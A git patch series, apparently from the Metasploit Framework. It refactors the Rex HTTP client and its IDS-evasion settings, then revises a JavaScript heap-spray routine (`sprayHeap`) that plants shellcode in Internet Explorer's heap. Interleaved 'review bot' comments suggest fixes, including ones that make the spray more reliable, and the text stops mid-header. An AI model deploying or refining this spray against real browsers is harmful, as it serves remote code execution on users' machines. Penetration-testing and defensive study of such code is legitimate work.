diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index efc6e2b95c..3f6ac6b760 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -36,6 +36,7 @@ class ClientRequest attr_reader :opts def initialize(opts={}) + @cgi = (opts['cgi'].nil? ? true : opts['cgi']) @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] @@ -54,8 +55,8 @@ class ClientRequest @raw_headers = opts['raw_headers'] || "" @uri = opts['uri'] @user_agent = opts['agent'] - @vars_get = opts['vars_get'] - @vars_post = opts['vars_post'] + @vars_get = opts['vars_get'] || {} + @vars_post = opts['vars_post'] || {} @version = opts['version'] @opts = opts diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 1dba9ca48d..14d28e8001 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -169,7 +169,6 @@ describe Rex::Proto::Http::ClientRequest do 'cgi' => true, 'vars_get' => { 'foo[]' => 'bar', - 'foo[]' => 'baz', } }) Rex::Proto::Http::ClientRequest.new(options_with_params) @@ -177,7 +176,6 @@ describe Rex::Proto::Http::ClientRequest do it "should contain the params" do client_request.to_s.should include("foo[]=bar") - client_request.to_s.should include("foo[]=baz") end end From 93537de68ca76601175512d6589115ae96b7e387 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 16:27:32 -0600 Subject: [PATCH 098/139] Use let and subject blocks for better readability --- spec/lib/rex/proto/http/client_spec.rb | 79 +++++++++++++------------- 1 file changed, 39 insertions(+), 40 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 0105b11136..d0e222df84 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb 
@@ -28,33 +28,32 @@ describe Rex::Proto::Http::Client do end - before(:all) do - @ip = "1.2.3.4" - @cli = Rex::Proto::Http::Client.new(@ip) + let(:ip) { "1.2.3.4" } + subject(:cli) do + Rex::Proto::Http::Client.new(ip) end it "should respond to intialize" do - @cli.should be + cli.should be end it "should have a set of default instance variables" do - @cli.instance_variable_get(:@hostname).should == @ip - @cli.instance_variable_get(:@port).should == 80 - @cli.instance_variable_get(:@context).should == {} - @cli.instance_variable_get(:@ssl).should be_false - @cli.instance_variable_get(:@proxies).should be_nil - # @cli.instance_variable_get(:@username).should be_empty - # @cli.instance_variable_get(:@password).should be_empty - @cli.config.should be_a_kind_of Hash - @cli.config_types.should be_a_kind_of Hash + cli.instance_variable_get(:@hostname).should == ip + cli.instance_variable_get(:@port).should == 80 + cli.instance_variable_get(:@context).should == {} + cli.instance_variable_get(:@ssl).should be_false + cli.instance_variable_get(:@proxies).should be_nil + # cli.instance_variable_get(:@username).should be_empty + # cli.instance_variable_get(:@password).should be_empty + cli.config.should be_a_kind_of Hash end it "should produce a raw HTTP request", :pending => "Waiting for PR #1500" do - @cli.request_raw.should be_a_kind_of Rex::Proto::Http::Request + cli.request_raw.should be_a_kind_of Rex::Proto::Http::ClientRequest end it "should produce a CGI HTTP request", :pending => "Waiting for PR #1500" do - @cli.request_cgi.should be_a_kind_of Rex::Proto::Http::Request + cli.request_cgi.should be_a_kind_of Rex::Proto::Http::ClientRequest end it "should attempt to connect to a server" do @@ -63,7 +62,7 @@ describe Rex::Proto::Http::Client do end it "should be able to close a connection" do - @cli.close.should be_nil + cli.close.should be_nil end it "should send a request and receive a response", :pending => excuse_needs_connection do 
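Review bot: The rewritten "should have a set of default instance variables" example drops the `config_types.should be_a_kind_of Hash` assertion that the old version carried, which is a behaviour change hidden inside a readability refactor; keep `cli.config_types.should be_a_kind_of Hash` unless `config_types` was intentionally removed from `Client`, in which case the `respond_to :config_types` expectation further down in the file should go as well. The two request examples keep `:pending => "Waiting for PR #1500"` while their expected class was updated to `ClientRequest`, so the pending markers will be stale as soon as that PR lands and should be removed then. The enclosing `describe` block starts before and ends after the hunk.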
@@ -79,7 +78,7 @@ describe Rex::Proto::Http::Client do end it "should test for credentials" do - # @cli.should_not have_creds + # cli.should_not have_creds # this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) # this_cli.should have_creds pending "Should actually respond to :has_creds" @@ -91,7 +90,7 @@ describe Rex::Proto::Http::Client do u = "user1" p = "pass1" b64 = ["#{u}:#{p}"].pack("m*").strip - @cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" + cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" end it "should perform digest authentication", :pending => excuse_needs_auth do 
@@ -107,45 +106,45 @@ describe Rex::Proto::Http::Client do end it "should end a connection with a stop" do - @cli.stop.should be_nil + cli.stop.should be_nil end it "should test if a connection is valid" do - @cli.conn?.should be_false + cli.conn?.should be_false end it "should tell if pipelining is enabled" do - @cli.pipelining?.should be_false + cli.pipelining?.should be_false this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) this_cli.pipeline = true this_cli.pipelining?.should be_true end it "should respond to its various accessors" do - @cli.should respond_to :config - @cli.should respond_to :config_types - @cli.should respond_to :pipeline - @cli.should respond_to :local_host - @cli.should respond_to :local_port - @cli.should respond_to :conn - @cli.should respond_to :context - @cli.should respond_to :proxies - # @cli.should respond_to :username - # @cli.should respond_to :password - @cli.should respond_to :junk_pipeline + cli.should respond_to :config + cli.should respond_to :config_types + cli.should respond_to :pipeline + cli.should respond_to :local_host + cli.should respond_to :local_port + cli.should respond_to :conn + cli.should respond_to :context + cli.should respond_to :proxies + # cli.should respond_to :username + # cli.should respond_to :password + cli.should respond_to :junk_pipeline # These are supposed to be protected - @cli.should respond_to :ssl - @cli.should respond_to :ssl_version - @cli.should respond_to :hostname - @cli.should respond_to :port + cli.should respond_to :ssl + cli.should respond_to :ssl_version + cli.should respond_to :hostname + cli.should respond_to :port end # Not super sure why these are protected... 
it "should refuse access to its protected accessors" do - expect {@cli.ssl}.to raise_error NoMethodError - expect {@cli.ssl_version}.to raise_error NoMethodError - expect {@cli.hostname}.to raise_error NoMethodError - expect {@cli.port}.to raise_error NoMethodError + expect {cli.ssl}.to raise_error NoMethodError + expect {cli.ssl_version}.to raise_error NoMethodError + expect {cli.hostname}.to raise_error NoMethodError + expect {cli.port}.to raise_error NoMethodError end end From 935304ee0c31477a0e5ae9f890f168636fb91b95 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 16:36:36 -0600 Subject: [PATCH 099/139] No longer pending --- spec/lib/rex/proto/http/client_spec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index d0e222df84..d216c75325 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -48,11 +48,11 @@ describe Rex::Proto::Http::Client do cli.config.should be_a_kind_of Hash end - it "should produce a raw HTTP request", :pending => "Waiting for PR #1500" do + it "should produce a raw HTTP request" do cli.request_raw.should be_a_kind_of Rex::Proto::Http::ClientRequest end - it "should produce a CGI HTTP request", :pending => "Waiting for PR #1500" do + it "should produce a CGI HTTP request" do cli.request_cgi.should be_a_kind_of Rex::Proto::Http::ClientRequest end From 29df20996e537076e9f6ee33fb92fdd2b908a069 Mon Sep 17 00:00:00 2001 
From: James Lee Date: Tue, 26 Feb 2013 17:38:03 -0600 Subject: [PATCH 100/139] Move most of the configuration into ClientRequest Also fixes in-place modification of the query string which resulted in duplication of the GET parameters when calling #to_s more than once. --- lib/rex/proto/http/client.rb | 79 ++--------------- lib/rex/proto/http/client_request.rb | 88 ++++++++++++++----- lib/rex/text.rb | 4 +- .../lib/rex/proto/http/client_request_spec.rb | 72 ++++++++++++--- 4 files changed, 132 insertions(+), 111 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 8bb69f2735..2912065309 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,6 +8,8 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' +require 'rex/proto/http/client_request' + module Rex module Proto module Http @@ -21,7 +23,7 @@ module Http ### class Client - DefaultUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" + DefaultUserAgent = Rex::Proto::Http::ClientRequest::DefaultUserAgent # # Creates a new client instance 
@@ -35,85 +37,14 @@ class Client self.proxies = proxies self.username = username self.password = password + self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, 'version' => '1.1', 'agent' => DefaultUserAgent, - # - # Evasion options - # - 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all - 'uri_encode_count' => 1, # integer - 'uri_full_url' => false, # bool - 'pad_method_uri_count' => 1, # integer - 'pad_uri_version_count' => 1, # integer - 'pad_method_uri_type' => 'space', # space, tab, apache - 'pad_uri_version_type' => 'space', # space, tab, apache - 'method_random_valid' => false, # bool - 'method_random_invalid' => false, # bool - 'method_random_case' => false, # bool - 'version_random_valid' => false, # bool - 'version_random_invalid' => false, # bool - 'version_random_case' => false, # bool - 'uri_dir_self_reference' => false, # bool - 'uri_dir_fake_relative' => false, # bool - 'uri_use_backslashes' => false, # bool - 'pad_fake_headers' => false, # bool - 'pad_fake_headers_count' => 16, # integer - 'pad_get_params' => false, # bool - 'pad_get_params_count' => 8, # integer - 'pad_post_params' => false, # bool - 'pad_post_params_count' => 8, # integer - 'uri_fake_end' => false, # bool - 'uri_fake_params_start' => false, # bool - 'header_folding' => false, # bool - 'chunked_size' => 0, # integer - # - # NTLM Options - # - 'usentlm2_session' => true, - 'use_ntlmv2' => true, - 'send_lm' => true, - 'send_ntlm' => true, - 'SendSPN' => true, - 'UseLMKey' => false, - 'domain' => 'WORKSTATION', - # - # Digest Options - # - 'DigestAuthIIS' => true - } + }.merge(Http::ClientRequest::DefaultConfig) - # This is not used right now... 
- self.config_types = { - 'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-random', 'u-all'], - 'uri_encode_count' => 'integer', - 'uri_full_url' => 'bool', - 'pad_method_uri_count' => 'integer', - 'pad_uri_version_count' => 'integer', - 'pad_method_uri_type' => ['space', 'tab', 'apache'], - 'pad_uri_version_type' => ['space', 'tab', 'apache'], - 'method_random_valid' => 'bool', - 'method_random_invalid' => 'bool', - 'method_random_case' => 'bool', - 'version_random_valid' => 'bool', - 'version_random_invalid' => 'bool', - 'version_random_case' => 'bool', - 'uri_dir_self_reference' => 'bool', - 'uri_dir_fake_relative' => 'bool', - 'uri_use_backslashes' => 'bool', - 'pad_fake_headers' => 'bool', - 'pad_fake_headers_count' => 'integer', - 'pad_get_params' => 'bool', - 'pad_get_params_count' => 'integer', - 'pad_post_params' => 'bool', - 'pad_post_params_count' => 'integer', - 'uri_fake_end' => 'bool', - 'uri_fake_params_start' => 'bool', - 'header_folding' => 'bool', - 'chunked_size' => 'integer' - } end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 3f6ac6b760..68c3aa5f48 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -1,7 +1,10 @@ # -*- coding: binary -*- require 'uri' -require 'rex/proto/http' +#require 'rex/proto/http' +require 'rex/socket' +require 'rex/text' +require 'pp' module Rex module Proto 
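Review bot: The merge direction in `self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, }.merge(Http::ClientRequest::DefaultConfig)` lets the shared defaults win over the client's own values, so any key that later lands in `DefaultConfig` and is also set here (the per-host `'vhost'` is the obvious candidate) would silently replace the per-instance value. In this hunk the two hashes do not appear to overlap, so the problem is latent rather than live. Reversing it, `self.config = Http::ClientRequest::DefaultConfig.merge('read_max_data' => (1024*1024*1), 'vhost' => self.hostname)`, keeps the instance-specific settings authoritative. The `initialize` this belongs to opens before the hunk.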
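Review bot: `require 'pp'` added at the top of client_request.rb reads as a debugging leftover, and the commented-out `#require 'rex/proto/http'` just above it is dead text; neither belongs in library code that every HTTP module loads. The pretty-printer is not referenced anywhere in the visible changes, and the stale comment invites the next reader to wonder whether the old dependency is still needed. Drop both lines and keep only the `require 'rex/socket'` and `require 'rex/text'` the commit adds for the names this class now resolves on its own.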
@@ -9,6 +12,55 @@ module Http class ClientRequest + DefaultUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" + DefaultConfig = { + # + # Evasion options + # + 'encode_params' => true, + 'encode' => true, + 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all + 'uri_encode_count' => 1, # integer + 'uri_full_url' => false, # bool + 'pad_method_uri_count' => 1, # integer + 'pad_uri_version_count' => 1, # integer + 'pad_method_uri_type' => 'space', # space, tab, apache + 'pad_uri_version_type' => 'space', # space, tab, apache + 'method_random_valid' => false, # bool + 'method_random_invalid' => false, # bool + 'method_random_case' => false, # bool + 'version_random_valid' => false, # bool + 'version_random_invalid' => false, # bool + 'version_random_case' => false, # bool + 'uri_dir_self_reference' => false, # bool + 'uri_dir_fake_relative' => false, # bool + 'uri_use_backslashes' => false, # bool + 'pad_fake_headers' => false, # bool + 'pad_fake_headers_count' => 16, # integer + 'pad_get_params' => false, # bool + 'pad_get_params_count' => 8, # integer + 'pad_post_params' => false, # bool + 'pad_post_params_count' => 8, # integer + 'uri_fake_end' => false, # bool + 'uri_fake_params_start' => false, # bool + 'header_folding' => false, # bool + 'chunked_size' => 0, # integer + # + # NTLM Options + # + 'usentlm2_session' => true, + 'use_ntlmv2' => true, + 'send_lm' => true, + 'send_ntlm' => true, + 'SendSPN' => true, + 'UseLMKey' => false, + 'domain' => 'WORKSTATION', + # + # Digest Options + # + 'DigestAuthIIS' => true + } + attr_accessor :authorization attr_accessor :cgi attr_accessor :config @@ -16,8 +68,6 @@ class ClientRequest attr_accessor :content_type attr_accessor :cookie attr_accessor :data - attr_accessor :encode - attr_accessor :encode_params attr_accessor :headers attr_accessor :host attr_accessor :method 
@@ -37,13 +87,11 @@ class ClientRequest def initialize(opts={}) @cgi = (opts['cgi'].nil? ? true : opts['cgi']) - @config = opts['client_config'] || {} + @config = DefaultConfig.merge(opts['client_config'] || {}) @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] @data = opts['data'] || "" - @encode = opts['encode'] - @encode_params = opts['encode_params'] @headers = opts['headers'] || {} @host = opts['vhost'] @method = opts['method'] || "GET" @@ -51,28 +99,26 @@ class ClientRequest @port = opts['port'] || 80 @protocol = opts['proto'] || "HTTP" @query = opts['query'] || "" - @ssl = opts['ssl'] || false + @ssl = opts['ssl'] @raw_headers = opts['raw_headers'] || "" @uri = opts['uri'] @user_agent = opts['agent'] @vars_get = opts['vars_get'] || {} @vars_post = opts['vars_post'] || {} - @version = opts['version'] + @version = opts['version'] || "1.1" @opts = opts - config['chunked_size'] ||= 0 - config['pad_method_uri_count'] ||= 1 end def to_s - # Start GET query string - qstr = query + # Start GET query string + qstr = query.dup # Start POST data string pstr = data - if cgi == true + if cgi uri_str= set_cgi if (config['pad_get_params']) @@ -86,9 +132,9 @@ class ClientRequest vars_get.each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (encode_params ? set_encode_uri(var) : var) + qstr << (config['encode_params'] ? set_encode_uri(var) : var) qstr << '=' - qstr << (encode_params ? set_encode_uri(val) : val) + qstr << (config['encode_params'] ? set_encode_uri(val) : val) end if (config['pad_post_params']) 
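Review bot: With `@encode = opts['encode']` and `@encode_params = opts['encode_params']` removed, both switches are now read only from `config`, i.e. from `opts['client_config']` merged over `DefaultConfig`, where each defaults to `true`. Before this change an absent option meant no encoding (a nil ivar), so a caller that still passes `'encode' => false` or `'encode_params' => …` as a top-level request option now has that value silently ignored and gets percent-encoding switched on; whether the `Client` passes them that way is not visible in the hunk. Either keep honouring the top-level keys, `@config['encode'] = opts['encode'] unless opts['encode'].nil?` and the same for `'encode_params'`, or state in the class header that these two options now live under `'client_config'`.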
@@ -96,21 +142,21 @@ class ClientRequest rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) pstr << '&' if pstr.length > 0 - pstr << (encode_params ? set_encode_uri(rand_var) : rand_var) + pstr << (config['encode_params'] ? set_encode_uri(rand_var) : rand_var) pstr << '=' - pstr << (encode_params ? set_encode_uri(rand_val) : rand_val) + pstr << (config['encode_params'] ? set_encode_uri(rand_val) : rand_val) end end vars_post.each_pair do |var,val| pstr << '&' if pstr.length > 0 - pstr << (encode_params ? set_encode_uri(var) : var) + pstr << (config['encode_params'] ? set_encode_uri(var) : var) pstr << '=' - pstr << (encode_params ? set_encode_uri(val) : val) + pstr << (config['encode_params'] ? set_encode_uri(val) : val) end else uri_str = set_uri - if encode + if config['encode'] qstr = set_encode_uri(qstr) end end @@ -120,7 +166,7 @@ class ClientRequest req << set_method_uri_spacer() req << set_uri_prepend() - if encode + if config['encode'] req << set_encode_uri(uri_str) else req << uri_str diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 9db91c0d8e..e9a46035ff 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -158,7 +158,7 @@ module Text # Converts ISO-8859-1 to UTF-8 # def self.to_utf8(str) - + if str.respond_to?(:encode) # Skip over any bytes that fail to convert to UTF-8 return str.encode('utf-8', { :invalid => :replace, :undef => :replace, :replace => '' }) @@ -550,7 +550,7 @@ module Text when 'u-half' return str.gsub(all) { |s| Rex::Text.to_hex(Rex::Text.to_unicode(s, 'uhwtfms-half'), '%u', 2) } else - raise TypeError, 'invalid mode' + raise TypeError, "invalid mode #{mode.inspect}" end end diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 14d28e8001..154a1a9485 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb 
@@ -7,10 +7,8 @@ shared_context "with 'uri_dir_self_reference'" do client_request.config['uri_dir_self_reference'] = true end - describe "#set_uri" do - it "should return the unmodified uri" do - client_request.send(:set_uri).should == "/./" - end + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/./" end end @@ -21,10 +19,8 @@ shared_context "with no evasions" do client_request.config['uri_full_url'] = false end - describe "#set_uri" do - it "should return the unmodified uri" do - client_request.send(:set_uri).should == "/" - end + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/" end end 
@@ -166,17 +162,65 @@ describe Rex::Proto::Http::ClientRequest do context "with GET paramaters" do subject(:client_request) { options_with_params = default_options.merge({ - 'cgi' => true, - 'vars_get' => { - 'foo[]' => 'bar', - } + 'client_config' => { + 'uri_encode_mode' => encode_mode, + 'encode_params' => encode_params, + 'encode' => false, + }, + 'vars_get' => vars_get, }) Rex::Proto::Http::ClientRequest.new(options_with_params) } + # default + let(:encode_mode) { 'hex-normal' } - it "should contain the params" do - client_request.to_s.should include("foo[]=bar") + let(:vars_get) do + { + 'foo[]' => 'bar', + 'bar' => 'baz', + 'frobnicate' => 'the froozle?', + } end + + context "without 'encode_params'" do + let(:encode_params) { false } + it "should contain the unaltered params" do + str = client_request.to_s + str.should include("foo[]=bar") + str.should include("bar=baz") + str.should include("frobnicate=the froozle?") + end + end + + context "with 'encode_params'" do + let(:encode_params) { true } + context "with 'uri_encode_mode' = default (hex-normal)" do + it "should encode special chars" do + str = client_request.to_s + str.should include("foo%5b%5d=bar") + str.should include("bar=baz") + str.should include("frobnicate=the%20froozle%3f") + end + end + + context "with 'uri_encode_mode' = hex-all" do + let(:encode_mode) { 'hex-all' } + it "should encode all chars" do + str = client_request.to_s + str.should include("%66%6f%6f%5b%5d=%62%61%72") + str.should include("%62%61%72=%62%61%7a") + str.should include("%66%72%6f%62%6e%69%63%61%74%65=%74%68%65%20%66%72%6f%6f%7a%6c%65%3f") + end + end + + describe "#to_s" do + it "should produce same values if called multiple times with same options" do + client_request.to_s.should == client_request.to_s + end + end + + end + end describe "#set_uri" do From 7a7dd8975f4125dda67d7499cc12f47f71691e10 Mon Sep 17 00:00:00 2001 
From: James Lee Date: Tue, 26 Feb 2013 18:16:44 -0600 Subject: [PATCH 101/139] Hmm, turns out something actually used that Despite comments to the contrary --- lib/rex/proto/http/client.rb | 30 ++++++++++++++++++++++++++++ lib/rex/proto/http/client_request.rb | 2 +- 2 files changed, 31 insertions(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 2912065309..f3073ca530 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -45,6 +45,36 @@ class Client 'agent' => DefaultUserAgent, }.merge(Http::ClientRequest::DefaultConfig) + self.config_types = { + 'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-random', 'u-all'], + 'uri_encode_count' => 'integer', + 'uri_full_url' => 'bool', + 'pad_method_uri_count' => 'integer', + 'pad_uri_version_count' => 'integer', + 'pad_method_uri_type' => ['space', 'tab', 'apache'], + 'pad_uri_version_type' => ['space', 'tab', 'apache'], + 'method_random_valid' => 'bool', + 'method_random_invalid' => 'bool', + 'method_random_case' => 'bool', + 'version_random_valid' => 'bool', + 'version_random_invalid' => 'bool', + 'version_random_case' => 'bool', + 'uri_dir_self_reference' => 'bool', + 'uri_dir_fake_relative' => 'bool', + 'uri_use_backslashes' => 'bool', + 'pad_fake_headers' => 'bool', + 'pad_fake_headers_count' => 'integer', + 'pad_get_params' => 'bool', + 'pad_get_params_count' => 'integer', + 'pad_post_params' => 'bool', + 'pad_post_params_count' => 'integer', + 'uri_fake_end' => 'bool', + 'uri_fake_params_start' => 'bool', + 'header_folding' => 'bool', + 'chunked_size' => 'integer' + } + + end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 68c3aa5f48..1b55784e99 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -116,7 +116,7 @@ class ClientRequest qstr = query.dup # Start POST data string - pstr = data + pstr = data.dup if cgi uri_str= set_cgi 
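Review bot: The restored `config_types` table does not list the two evasion keys this series added to `ClientRequest::DefaultConfig`, `'encode'` and `'encode_params'`, so whatever consumes it (the commit message says something still does) will see them as untyped. Adding `'encode' => 'bool'` and `'encode_params' => 'bool'` next to the other `bool` entries keeps the table in step with the defaults it describes. A one-line comment above the hash naming the consumer would also stop the next person from deleting it again, which is exactly what the previous commit did. The surrounding `initialize` begins before this hunk.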
From e3f075730416bd8d27a1d93cda957af6d9824fac Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 27 Feb 2013 14:08:57 -0600 Subject: [PATCH 102/139] Improved version thanks to corelanc0d3r --- lib/msf/core/exploit/http/server.rb | 27 +++++++++++++++++++-------- 1 file changed, 19 insertions(+), 8 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 5fdfaf77ff..0ec0b0beb2 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -798,17 +798,27 @@ protected # publication on "DEPS – Precise Heap Spray on Firefox and IE10" # def js_property_spray - js = %Q|function sprayHeap(shellcode, browser, heapBlockSize, offset , maxAllocs) { + js = %Q|function sprayHeap( oArg ) { + + shellcode = oArg.shellcode; + browser = oArg.browser; + offset = oArg.offset; + heapBlockSize = oArg.heapBlockSize; + maxAllocs = oArg.maxAllocs; + objId = oArg.objId; + + if (shellcode == undefined) { throw "Missing argument: shellcode"; } + if (objId == undefined) { throw "Missing argument: objId"; } if (offset == undefined) { offset = 0x104; } if (heapBlockSize == undefined) { heapBlockSize = 0x40000; } - if (maxAllocs == undefined) { maxAllocs = 500; } + if (maxAllocs == undefined) { maxAllocs = 0x250; } if (browser == undefined) { browser = 'generic'; } - var div_container = document.createElement("div"); + var div_container = document.getElementById(objId); div_container.style.cssText = "display:none"; var data; junk = unescape("%u2020%u2020"); - while (junk.length < offset+0x1000) junk += junk; + while (junk.length < 0x1000) junk += junk; data = junk.substring(0,offset) + shellcode; data += junk.substring(0,0x800-offset-shellcode.length); 
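Review bot: The new argument unpacking `shellcode = oArg.shellcode; browser = oArg.browser; … objId = oArg.objId;` declares none of these with `var`, so each becomes a property of the page's global object that can clobber, or be clobbered by, a same-named variable in the module's own script (`shellcode` is a likely collision), and the assignments throw outright under strict mode. Declaring them locally, `var shellcode = oArg.shellcode, browser = oArg.browser, offset = oArg.offset, heapBlockSize = oArg.heapBlockSize, maxAllocs = oArg.maxAllocs, objId = oArg.objId;`, fixes both, and `junk` a few lines further down has the same problem. Separately, `document.getElementById(objId)` returns null when no such element exists, which the `objId == undefined` check does not cover, so `if (div_container == null) { throw "No element with id " + objId; }` belongs before `.style.cssText` is touched. The `sprayHeap` function continues past the end of the hunk.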
@@ -821,22 +831,23 @@ protected switch (browser) { case 'ie8': - obj.title = data.substring(0,(heapBlockSize-6)/2); + obj.title = data.substring(0, (heapBlockSize-6)/2); div_container.appendChild(obj); break; case 'ie9': - obj.title = data.substring(0,(heapBlockSize-2)/2); + obj.title = data.substring(0, (heapBlockSize-2)/2); div_container.appendChild(obj); break; case 'ie10': - obj.title = data.substring(0,(heapBlockSize-2/2) / 2); + obj.title = data.substring(0, (heapBlockSize-2/2) / 2); div_container.appendChild(obj); break; case 'generic': - obj.title = data.substring(0, heapBlockSize); + obj.title = data.substring(0, heapBlockSize-0x58); + obj.style.fontFamily = data.substring(0, heapBlockSize-0x58); div_container.appendChild(obj); break; From 312638d6a5d3d72daf41e2c4097c109c9b63233f Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 27 Feb 2013 14:32:39 -0600 Subject: [PATCH 103/139] Correct allocation size for IE10 --- lib/msf/core/exploit/http/server.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 0ec0b0beb2..32d54a541e 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -795,7 +795,9 @@ protected # # This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty) # function to trigger allocations by ntdll!RtlAllocateHeap. It is based on Corelan's - # publication on "DEPS – Precise Heap Spray on Firefox and IE10" + # publication on "DEPS – Precise Heap Spray on Firefox and IE10". + # + # # def js_property_spray js = %Q|function sprayHeap( oArg ) { @@ -841,7 +843,7 @@ protected break; case 'ie10': - obj.title = data.substring(0, (heapBlockSize-2/2) / 2); + obj.title = data.substring(0, (heapBlockSize-2)/2); div_container.appendChild(obj); break; From bb02dc43b35841aa5dcfc2cf4afe681bdd5a3e64 Mon Sep 17 00:00:00 2001 
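Review bot: The `switch (browser)` handles only `'ie8'`, `'ie9'`, `'ie10'` and `'generic'`; if no `default:` branch follows beyond the hunk, a misspelled or unsupported `browser` value makes every loop iteration allocate nothing and the spray fails silently instead of with a message a module author can act on. Adding `default: throw "Unsupported browser: " + browser;` after the `'generic'` case surfaces the mistake, matching the `throw` style the function already uses for missing arguments. The `switch` and the enclosing `for` loop close outside this hunk.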
From: sinn3r Date: Wed, 27 Feb 2013 15:34:21 -0600 Subject: [PATCH 104/139] Documentation --- lib/msf/core/exploit/http/server.rb | 36 +++++++++++++++++++++-------- 1 file changed, 27 insertions(+), 9 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 32d54a541e..6b5c143a9f 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -797,17 +797,34 @@ protected # function to trigger allocations by ntdll!RtlAllocateHeap. It is based on Corelan's # publication on "DEPS – Precise Heap Spray on Firefox and IE10". # - # + # The "sprayHeap" JavaScript function supports the following arguments: + # shellcode => The shellcode to spray in JavaScript. + # objId => The ID for a
HTML tag. + # browser => The type of browser to target for precise block size, such as: + # 'ie8', 'ie9', 'ie10', and 'generic'. + # offset => Optional. Number of bytes to align the shellcode, default: 0x104 + # heapBlockSize => Optional. Allocation size, default: 0x40000 + # maxAllocs => Optional. Number of allocation calls, default: 0x250 + # + # Example of using the 'sprayHeap' function: + #
+ # # def js_property_spray js = %Q|function sprayHeap( oArg ) { - shellcode = oArg.shellcode; - browser = oArg.browser; - offset = oArg.offset; + shellcode = oArg.shellcode; + browser = oArg.browser; + offset = oArg.offset; heapBlockSize = oArg.heapBlockSize; - maxAllocs = oArg.maxAllocs; - objId = oArg.objId; + maxAllocs = oArg.maxAllocs; + objId = oArg.objId; if (shellcode == undefined) { throw "Missing argument: shellcode"; } if (objId == undefined) { throw "Missing argument: objId"; } @@ -816,16 +833,18 @@ protected if (maxAllocs == undefined) { maxAllocs = 0x250; } if (browser == undefined) { browser = 'generic'; } + if (offset > 0x800) { throw "Bad alignment"; } + var div_container = document.getElementById(objId); div_container.style.cssText = "display:none"; var data; junk = unescape("%u2020%u2020"); - while (junk.length < 0x1000) junk += junk; + while (junk.length < offset+0x1000) junk += junk; data = junk.substring(0,offset) + shellcode; data += junk.substring(0,0x800-offset-shellcode.length); - while (data.length < 0x80000) data += data; + while (data.length < heapBlockSize) data += data; for (var i = 0; i < maxAllocs; i++) { @@ -849,7 +868,6 @@ protected case 'generic': obj.title = data.substring(0, heapBlockSize-0x58); - obj.style.fontFamily = data.substring(0, heapBlockSize-0x58); div_container.appendChild(obj); break; From d5ae54cbb64b3e1db831d07f9840226dd27a228e Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 27 Feb 2013 16:27:37 